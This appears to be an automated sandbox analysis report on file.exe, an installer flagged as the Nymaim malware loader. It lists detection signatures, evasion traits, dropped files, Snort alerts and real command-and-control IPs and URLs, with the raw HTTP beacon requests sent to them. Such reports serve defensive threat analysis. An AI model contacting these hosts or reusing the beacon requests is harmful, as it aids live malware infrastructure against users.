Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 778239
MD5: 4206f8b371294f11b01592acc7bb338d
SHA1: 9383a82b185715c4b42b23ef730acb53f17dfcfb
SHA256: 5f5252d8963550284ca23188a6ee8a5b9aa85c3d1ce1f5983ee7dcc7e60f8b33
Tags: exe
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://107.182.129.235/storage/extension.php8 Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://107.182.129.235/storage/extension.php8 Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe ReversingLabs: Detection: 50%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.SplitFiles131.exe.10000000.5.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.0.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.SplitFiles131.exe.400000.1.raw.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167"]}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_10001000 ISCryptGetVersion, 1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_10001130 ArcFourCrypt, 1_2_10001130
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.4:49696 -> 45.139.105.171:80
Source: Traffic Snort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
Source: Traffic Snort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.4:49697 -> 107.182.129.235:80
Source: Traffic Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.4:49697
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 45.139.105.1
Source: Malware configuration extractor IPs: 85.31.46.167
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.139.105.171 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php8
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235ibrary.php
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.php
Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-MR54O.tmp.1.dr, is-IRLOP.tmp.1.dr String found in binary or memory: http://rus.altarsoft.com/split_files.shtml
Source: is-EPSRP.tmp, 00000001.00000002.377627228.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.378622763.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-2KTR4.tmp.1.dr, is-KJUD7.tmp.1.dr, is-8T8VP.tmp.1.dr, is-L90L4.tmp.1.dr, is-JPC2L.tmp.1.dr, is-4QNQO.tmp.1.dr, is-DPLT0.tmp.1.dr, is-2C8S0.tmp.1.dr, is-BOL01.tmp.1.dr, is-T2GFQ.tmp.1.dr String found in binary or memory: http://www.altarsoft.com/split_files.shtml
Source: file.exe String found in binary or memory: http://www.innosetup.com
Source: is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377767344.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000000.00000003.296613859.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.296406319.0000000002300000.00000004.00001000.00020000.00000000.sdmp, is-EPSRP.tmp, 00000001.00000002.377659130.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-5V8K4.tmp.1.dr, is-EPSRP.tmp.0.dr String found in binary or memory: http://www.remobjects.com/?psU
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: global traffic HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Creates a DirectInput object (often for capturing keystrokes)
Source: rf6CwnLa.exe, 00000003.00000002.312986657.0000000001750000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected Nymaim
Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SplitFiles131.exe.3210000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.376873365.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.376708257.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.375917003.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408280 0_2_00408280
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00468C28 1_2_00468C28
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00461280 1_2_00461280
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0043DE40 1_2_0043DE40
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004302D0 1_2_004302D0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004445B8 1_2_004445B8
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00434864 1_2_00434864
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0047AA90 1_2_0047AA90
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00444B60 1_2_00444B60
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045ADE0 1_2_0045ADE0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00480F94 1_2_00480F94
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00445258 1_2_00445258
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004132E1 1_2_004132E1
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00463288 1_2_00463288
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00435568 1_2_00435568
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00445664 1_2_00445664
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0042F874 1_2_0042F874
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00457F04 1_2_00457F04
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004096F0 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004150D3 2_2_004150D3
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00415305 2_2_00415305
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004223A9 2_2_004223A9
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00419510 2_2_00419510
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00426850 2_2_00426850
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00410A50 2_2_00410A50
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0042AB9A 2_2_0042AB9A
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00421C88 2_2_00421C88
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0042ACBA 2_2_0042ACBA
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00428D39 2_2_00428D39
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000F670 2_2_1000F670
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000EC61 2_2_1000EC61
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: String function: 0040F9E0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 004035DC appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00408CA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00403548 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00446194 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00445EC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 004037CC appears 193 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 0043477C appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00455D54 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00407988 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00455B64 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00451DE8 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: String function: 00405A9C appears 92 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00423C4C NtdllDefWindowProc_A, 1_2_00423C4C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004126A0 NtdllDefWindowProc_A, 1_2_004126A0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00455514 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00455514
PE file contains executable resources (Code or Archives)
Source: is-EPSRP.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-EPSRP.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-EPSRP.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
